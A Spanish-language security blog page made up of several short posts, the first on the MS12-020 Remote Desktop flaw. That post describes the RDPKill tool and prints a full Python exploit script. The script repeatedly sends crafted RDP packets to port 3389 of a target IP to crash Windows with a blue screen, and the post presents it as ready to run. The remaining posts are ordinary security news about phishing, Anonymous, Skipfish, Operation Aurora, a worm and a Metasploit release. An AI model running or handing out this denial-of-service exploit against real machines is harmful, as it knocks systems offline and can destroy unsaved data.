Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP. Lo más grave de esta vulnerabilidad podría permitir la ejecución remota de código si un atacante envía una secuencia de paquetes RDP a un sistema afectado. De forma predeterminada, el protocolo de Escritorio remoto (RDP) no está habilitado en ningún sistema operativo Windows. Los sistemas que no tienen RDP habilitado no están expuestos.
Los riesgos de esta  vulnerabilidad tiene el potencial de causar estragos en las empresas, organizaciones gubernamentales y usuarios individuales, ya que permite a atacantes remotos caminar a la derecha en la red sin necesidad de autenticación, dijo Percoco. Mientras RDP está desactivado por defecto en la mayoría de los sistemas de Windows, los usuarios y administradores de pequeñas y medianas empresas a menudo se enciende para soporte técnico remoto. Muchos se olvidan de apagarlo.

Hemos encontrado una herramienta llamada RDPKill,dicha herramienta explota la vulnerabilidad de escritorio remoto tan solo poniendo en uno de los campos el target o IP objetivo en este caso el IP del escrito remoto al cual quremos atacar y en el otro campo pondremos el puerto remoto y darle clik al boton Kill , el objetivo de esta herramienta acaba causando un BSOD en el equipo remoto, el famoso BSDO la llamada Blue Screen of Death mas conocida como pantalla azul de la muerte,como sabemos existen 2 tipos de pantallas azules de la muerte , la mas perjudicial es la hace que cuando el núcleo del sistema operativo Windows XP no puede recuperarse de un error y la única acción que un usuario puede realizar es reiniciar el sistema perdiendo todo el trabajo no guardado, el estado de todos los programas ejecutándose en ese momento y poniendo en peligro la integridad del sistema de archivos y los archivos mismos creados mediante Windows, en este punto es posible perder toda la información en los discos duros gestionados por Windows y su sistema de archivos NTFS o FAT 16/FAT 32.

La otra forma de  tambien hemos encontrado es ejecutando el exploit de esta vulnerabilidad y ha sido probado en una maquina virtual  en WINXP SP3

El código del exploit:

# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
#
# freenode #ms12-020

import socket
import sys
import time

#init
buf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)
#MCS: Connection-initial
buf1 = “030001d602f0807f658201940401010401010101ff3019020400000000020

4000000020204000000000204000000010204000000000204000000010202ffff020

4000000023019020400000001020400000001020400000001020400000001020400

00000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204

000000010204000000000204000000010202ffff0204000000020482013300050014

7c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca0

3aa09040000ce0e000048004f005300540000000000000000000000000000000000

000000000000000004000000000000000c00000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000001ca010000000000100007000100300

030003000300030002d003000300030002d0030003000300030003000300030002d

0030003000300030003000000000000000000000000000000000000000000000000

00004c00c000d0000000000000002c00c001b0000000000000003c02c00030000007

26470647200000000008080636c6970726472000000a0c0726470736e6400000000

00c0″.decode(‘hex’)

#payload
buf2 = “0300000802f08028″.decode(‘hex’)

package = buf0+buf1+buf2

HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
print i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((HOST,PORT))
try:
s.send(package)
rec = s.recv(1024)
except:
pass
s.close()
Al ejecutarlo la máquina Windows remota se reinicia.

A una semana del día internacional de la mujer, puedo predecir que aumentarán los indices de phishing por esos días. Y es que es algo ya tan usual que en fechas especiales los hackers maliciosos preparen sus herramientas y cartas personalizadas para hacer phishing usando de carnada el tema del día especial.
Una muy buena explicación sobre este tema la podemos ver en el siguiente video que publicaron nuestros amigos de ENHACKE. Espero les guste.

Saludos!

Hace un rato vi en la página de Filesonic que habian publicado un mensaje en su página principal.
Todo parece que estan modificando las funcionalidades ofrecidas originalmente por todos los sucesos que han habido en los ultimos dias.
En otras páginas dicen que es por presión del FBI, así que nos queda esperar ver un comunicado que brinde más información al respecto.

Les dejo una imagen del aviso que tienen publicado en FILESONIC.

Han sido publicados dos nuevos videos entre ayer y hoy por parte de anonymous, con respecto al tema de megaupload y los ataques que se vinieron llevando a cabo.
El primero es el aparentemente oficial, de mano de anonymous global.

Este segundo video es de anonymous latinoamerica.

Saludos!!

Casi un mes después de que un ingeniero de Google revelara los detalles de un nuevo agujero de seguridad en Windows XP, los ciberdelincuentes han aumentado enormemente la cantidad de ataques online dirigidos contra él.

Microsoft informó ayer de haber contabilizado ya más de 10.000 ataques contra esta vulnerabilidad. “En un primer momento sólo detectamos la existencia de investigadores legítimos que realizaban pruebas inocuas con software de prueba de concepto. Pero el 15 de junio aparecieron los primeros exploits públicos reales”, señala la compañía. Continua leyendo »

Google lanzo Skipfish, un nuevo y automatizado escaner de vulnerabilidades para aplicaciones web. Al igual que otras herramientas tiene un crawl que navega por todas las páginas del site para hacer el análisis correspondiente y una base de datos de pruebas a enviar.

El resultado es mostrado de modo si se cumplen las medidas de seguridad de un checklist de su base de datos.Se puede generar un reporte que se pueda mostrar como analisis de vulnerabilidades.

Continua leyendo »

Hace un mes,  se llevo a cabo un ataque a Google en el cual se obtuvo información valiosa de sus clientes.  Este ataque llamado “Operación Aurora” vulnera una falla del Internet Explorer en todas sus versiones, Metasploit adapto el exploit para trabajarlo en su framework y con ello hacer la demostración del ataque. Gracias a la gente de Enhacke que nos facilito este video.

Nos vemos.

Si quieres iniciarte en la Gestión de Seguridad de la Información, te recomendamos acceder a “ISO27000.es” y a la web de “INTECO” donde presentan conceptos del tema en forma online.

La gestión de la seguridad de la información debe realizarse mediante un proceso sistemático, documentado y conocido por toda la organización. Continua leyendo »

BitDefender identificó una nueva amenaza que combina el comportamiento destructivo de un virus con el mecanismo de difusión de un gusano. Hay dos nuevas variantes de este virus, el cual ingresa a la computadora como una inofensiva prueba de IQ.

Una vez ejecutada el gusano crea entre siete y nueve copias de si mismo dependiendo de la variante en areas críticas del sistema Windows.

Win32.Worm.Zimuse.A es un peligroso código malicioso. A diferencia del gusano, Win32.Worm.Zimuse. A puede llevar a perder data porque sobreescribe los primeros  50 KB del Master Boot Record que es una zona importante del disco duro. Continua leyendo »

El equipo de desarrolladores de Metasploit Framework lanzó una actualización, la version 3.3.3!

Algunas de las mejoras:

• Todos los exploits tienen un ranking, estan seleccionados en 7 categorias de configuración.
• El comando de búsqueda ahora funciona con -r, usando la clasificación mencionada.
• Los comandos de sesiones ahora pueden ejecutarse con -c ó un script con -s sobre todas las sesiones.
• El Win32EXE template se reduce de 88k a 37k.

Descargar la última version 3.3.3

• Windows 2000 a Windows 7
• Linux

Más información sobre la actualización en Metasploit Framework